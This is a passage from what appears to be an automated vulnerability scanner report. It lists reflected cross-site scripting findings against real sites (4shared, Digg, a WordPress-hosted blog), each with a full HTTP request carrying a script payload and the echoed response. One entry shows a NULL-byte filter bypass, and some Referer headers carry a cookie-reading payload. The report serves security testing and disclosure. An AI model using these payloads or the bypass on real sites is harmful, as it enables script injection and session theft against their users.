The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46541"-alert(1)-"704b9402c2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main46541"-alert(1)-"704b9402c2d/upload.jsp HTTP/1.1
Host: dc308.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main46541&quot;-alert(1)-&quot;704b9402c2d/upload.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:12:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc308.4shared.com/main46541"-alert(1)-"704b9402c2d/upload.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.142. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc308.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7371"-alert(1)-"109e745b72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/upload.jspa7371"-alert(1)-"109e745b72 HTTP/1.1
Host: dc308.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main/upload.jspa7371&quot;-alert(1)-&quot;109e745b72
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:12:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc308.4shared.com/main/upload.jspa7371"-alert(1)-"109e745b72";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.143. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e8cb0"><script>alert(1)</script>eee6eb58e9b was submitted in the REST URL parameter 1. This input was echoed as e8cb0"><script>alert(1)</script>eee6eb58e9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00e8cb0"><script>alert(1)</script>eee6eb58e9b HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 01:59:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2107412045744832512%3A187; expires=Sun, 27-Feb-2011 01:59:47 GMT; path=/; domain=digg.com
Set-Cookie: d=8bfb598c2877d172a9ca2cfcac5aad764d4f0bf5a31a5a261d3ab41be1d8a5f8; expires=Thu, 25-Feb-2021 12:07:27 GMT; path=/; domain=.digg.com
X-Digg-Time: D=260640 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16660

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00e8cb0"><script>alert(1)</script>eee6eb58e9b.rss">
...[SNIP]...

3.144. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2828"><script>alert(1)</script>eab5008b54d was submitted in the REST URL parameter 1. This input was echoed as e2828\"><script>alert(1)</script>eab5008b54d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contente2828"><script>alert(1)</script>eab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digibond.wpengine.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:10:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:10:10 GMT
Cache-Control: max-age=86400
X-Varnish: 1668613514
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.com/wp-contente2828\"><script>alert(1)</script>eab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=cbba07f9e4">
...[SNIP]...

3.145. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1648a"><script>alert(1)</script>480ef64af3a was submitted in the REST URL parameter 5. This input was echoed as 1648a\"><script>alert(1)</script>480ef64af3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icallist.css1648a"><script>alert(1)</script>480ef64af3a?ver=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digibond.wpengine.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:10:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=b35e1fa86201292c876a56cd670935a8; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:10:25 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css1648a\"><script>alert(1)</script>480ef64af3a?ver=1&amp;_login=8941e066cb">
...[SNIP]...

3.146. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c916"><script>alert(1)</script>97b02068444 was submitted in the REST URL parameter 1. This input was echoed as 1c916\"><script>alert(1)</script>97b02068444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1c916"><script>alert(1)</script>97b02068444/plugins/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602164
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content1c916\"><script>alert(1)</script>97b02068444/plugins/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=d8531f58ad">
...[SNIP]...

3.147. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77cc0"><script>alert(1)</script>a500ca9f17c was submitted in the REST URL parameter 2. This input was echoed as 77cc0\"><script>alert(1)</script>a500ca9f17c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins77cc0"><script>alert(1)</script>a500ca9f17c/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604642
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins77cc0\"><script>alert(1)</script>a500ca9f17c/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=6bb0606984">
...[SNIP]...

3.148. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c461c"><script>alert(1)</script>81ebd71ba86 was submitted in the REST URL parameter 5. This input was echoed as c461c\"><script>alert(1)</script>81ebd71ba86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icallist.cssc461c"><script>alert(1)</script>81ebd71ba86?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icallist.cssc461c\"><script>alert(1)</script>81ebd71ba86?ver=1&amp;_login=a230e581ae">
...[SNIP]...

3.149. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d47c"><script>alert(1)</script>cccc92e06a7 was submitted in the REST URL parameter 1. This input was echoed as 6d47c\"><script>alert(1)</script>cccc92e06a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content6d47c"><script>alert(1)</script>cccc92e06a7/plugins/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602653
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content6d47c\"><script>alert(1)</script>cccc92e06a7/plugins/amr-ical-events-list/css/icalprint.css?ver=1&amp;_login=a8aa1f4a55">
...[SNIP]...

3.150. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1507c"><script>alert(1)</script>38cdb41f31a was submitted in the REST URL parameter 2. This input was echoed as 1507c\"><script>alert(1)</script>38cdb41f31a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins1507c"><script>alert(1)</script>38cdb41f31a/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605002
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins1507c\"><script>alert(1)</script>38cdb41f31a/amr-ical-events-list/css/icalprint.css?ver=1&amp;_login=23ae79ccbf">
...[SNIP]...

3.151. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64300"><script>alert(1)</script>a237d15471e was submitted in the REST URL parameter 5. This input was echoed as 64300\"><script>alert(1)</script>a237d15471e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icalprint.css64300"><script>alert(1)</script>a237d15471e?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css64300\"><script>alert(1)</script>a237d15471e?ver=1&amp;_login=ebdae81ce4">
...[SNIP]...

3.152. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2db02"><script>alert(1)</script>561302ac03e was submitted in the REST URL parameter 1. This input was echoed as 2db02\"><script>alert(1)</script>561302ac03e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content2db02"><script>alert(1)</script>561302ac03e/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602153
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content2db02\"><script>alert(1)</script>561302ac03e/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1&amp;_login=26b7466406">
...[SNIP]...

3.153. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43df5"><script>alert(1)</script>8ce814d076d was submitted in the REST URL parameter 2. This input was echoed as 43df5\"><script>alert(1)</script>8ce814d076d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins43df5"><script>alert(1)</script>8ce814d076d/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604651
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins43df5\"><script>alert(1)</script>8ce814d076d/grunion-contact-form/css/grunion.css?ver=3.1.1&amp;_login=f8359160b1">
...[SNIP]...

3.154. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd478"><script>alert(1)</script>dd6edca9943 was submitted in the REST URL parameter 5. This input was echoed as bd478\"><script>alert(1)</script>dd6edca9943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/grunion-contact-form/css/grunion.cssbd478"><script>alert(1)</script>dd6edca9943?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
